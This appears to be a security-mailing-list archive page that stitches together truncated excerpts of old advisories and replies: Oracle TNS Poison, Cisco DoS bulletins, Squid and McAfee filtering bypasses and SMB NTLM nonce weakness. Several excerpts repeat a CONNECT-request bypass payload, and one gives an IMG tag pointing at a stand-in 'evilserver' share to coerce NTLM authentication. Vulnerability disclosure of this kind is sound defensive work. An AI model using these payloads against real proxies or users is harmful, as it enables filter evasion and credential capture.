
connections

The history of a -probably- 13 years old Oracle bug: TNS Poison

to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.

The vulnerability I called TNS Poison affects the component called TNS
Listener, which is responsible for connection establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The “feature” exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).


Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection


Advisory ID: cisco-sa-20120229-cuc

Revision 1.0

For Public Release 2012 February 29 16:00 UTC (GMT)

Cisco Security Advisory: Cisco IOS Software TCP Denial of Service Vulnerability

Summary
=======

Cisco IOS Software Release 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.


RE: Squid URL Filtering Bypass

To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.

The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.

Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).

Also, whether the McAfee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.


Windows SMB NTLM Authentication Weak Nonce Vulnerability

exhaustive).

        Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.

        (ii) An attacker A connects to system S and sends multiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to

[ADVISORY] NetCache URL DoS - Argentinian ISP

inaccessible by means of the prefetch cache control directive.

The procedure is very simple: sending a simple GET HTTP/1.1 request
to the victim URL several times will make the proxies no longer
serve it. Users will wait for about two minutes and then the TCP
connection will be closed, which, depending on the user agent, will
be interpreted as a valid zero-length HTTP 0.9 reply or as an error.

It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor

Cisco Security Advisory: Cisco IOS SSL VPN Vulnerability

Cisco IOS Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, which could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.

Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.

This advisory is posted at 

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:

  * TCP Connection Exhaustion Denial of Service Vulnerability
  * Session Initiation Protocol (SIP) Inspection Denial of Service
    Vulnerabilities
  * Skinny Client Control Protocol (SCCP) Inspection Denial of
    Service Vulnerability
  * WebVPN Datagram Transport Layer Security (DTLS) Denial of Service

Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA

SIP processing errors.

IPSec Client Authentication Processing Vulnerability

Cisco PIX and Cisco ASA devices that terminate remote access VPN
connections are vulnerable to a denial of service attack if the
device is running software versions prior to 7.2(4)2, 8.0(3)14, and
8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions
7.0 and 7.1 are not affected by this vulnerability.

SSL VPN Memory Leak Vulnerability

RE: McAfee Web Gateway URL Filtering Bypass

??

I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in :
1. comparing the HOST header to the host portion of the CONNECT URI 
2. resolving either to a name or IP address (depending on its original state) 
3. comparing the resolved results to each other (DNS RR records will be an interesting case)

The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:

Re: Squid URL Filtering Bypass

What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.

There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers

Re: Squid URL Filtering Bypass

In McAfee Web Gateway it is possible to convert GET methods into CONNECT
methods, and after the connection, send the same GET packet, without
modification and without cryptography. Even with the GET packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept them.
I think it is a vulnerability!
See my python code.

Thanks


Re: McAfee Web Gateway URL Filtering Bypass

Hello,

We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.

- Vikram

On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes

Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA

Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.

The telnet command is used to identify the IP addresses from which the
security appliance accepts Telnet connections.

    ASA(config)# telnet 192.168.10.0 255.255.255.0 inside

In the previous example, the Cisco ASA is configured to accept Telnet
connections on the inside interface from the 192.168.10.0/24 network.

CVE-2008-2625: Oracle DBMS – Proxy Authentication Vulnerability

Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer. 


Scope

Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism. 


Findings


Re: Squid URL Filtering Bypass

A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.

Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.

The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.

You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.

The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"


TCP/IP Orphaned Connections Vulnerability

Date: 09.09.2009
________________________________________________________________________

Vendor:                Microsoft Corporation
Product:               Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability:         TCP/IP Orphaned Connections Vulnerability
Affected Releases:     Windows Vista Business SP1/ Windows XP SP3
Severity:              Moderate
CVE:                   CVE-2009-1926
________________________________________________________________________


Ruby Net::HTTPS library does not validate server certificate CN

Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>

Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt

McAfee Web Gateway URL Filtering Bypass

# CVE: CVE-2012-2212


I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance trusts the Host field of the HTTP header when the CONNECT method is used.
Example

CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com


SEC Consult SA-20071204-0 :: SonicWALL Global VPN Client Format String Vulnerability

Vendor description:
---------------

The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.


Vulnerability overview:
---------------

Cisco Security Advisory: Cisco IOS XR Software SSHv1 Denial of Service Vulnerability

Affected Products
=================

This vulnerability affects all unfixed versions of Cisco IOS XR
Software devices configured to accept SSHv1 connections. Details on
the affected versions can be found in the Software Versions and Fixes
section of this advisory.

Vulnerable Products
+------------------

FortiGuard: URL Filtering Application Bypass Vulnerability

actually required to access a specific site on multi-homed web sites.
When no host header is used, the intended web site is actually not
displayed. Therefore, there is no risk.

Macula's Analysis: If you don't have some AV, HIPS, etc. properly
installed, through this vuln a workstation can connect to a malicious
"Hacking Site" and get infected. Also through this vuln, you can
connect to different porn sites without problems. And it does not matter
whether or not they are multi-homed web sites. So we consider it not a low risk.



Re: Squid URL Filtering Bypass

> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software trusts the Host field of the HTTP header when the CONNECT method is used.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>

[security bulletin] HPSBMA02593 SSRT100237 rev.1 - HP Virtual Connect Enterprise Manager (VCEM) for Windows, Remote Arbitrary File Download

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02550412
Version: 1

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2010-10-21
Last Updated: 2010-10-21

Squid URL Filtering Bypass

# Tested on: Squid Proxy 3.1.19
# CVE: CVE-2012-2213


I found a vulnerability in Squid Proxy that allows access to filtered sites.
The software trusts the Host field of the HTTP header when the CONNECT method is used.
Example

CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com


Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

these vulnerabilities. A Cisco ASA device configured for any of the
following features is affected:

  * Secure Socket Layer Virtual Private Network (SSL VPN)
  * When the affected device is configured to accept Cisco Adaptive
    Security Device Manager (ASDM) connections
  * TLS Proxy for Encrypted Voice Inspection
  * Cut-Through Proxy for Network Access when using HTTPS

SSL VPN (or WebVPN) is enabled with the "enable <interface name>"
command in "webvpn" configuration mode. SSL VPN is disabled by default.

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

(WLC) platforms. This security advisory outlines the details of the
following vulnerabilities:

  * Malformed HTTP or HTTPS authentication response denial of service
    vulnerability
  * SSH connections denial of service vulnerability
  * Crafted HTTP or HTTPS request denial of service vulnerability
  * Crafted HTTP or HTTPS request unauthorized configuration
    modification vulnerability

Cisco has released free software updates that address these

CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/


1. *Advisory Information*

Title: Firebird SQL op_connect_request main listener shutdown vulnerability

Miranda IM silent TLS failure

Summary:
Under certain conditions, Miranda ignores the "Use TLS" setting in 
Jabber accounts and uses an unencrypted connection.

Affected: Miranda IM (instant messenger), at least versions 0.8.16, 
0.9.0 alpha build #6 Unicode and SVN rev. 11383

Description:
If the following conditions are met:
  - "Use TLS" is enabled in the jabber account settings (Network - 

Family Connections 1.8.2 Blind SQL Injection (Correct Version)

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 1 Apr 2009

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.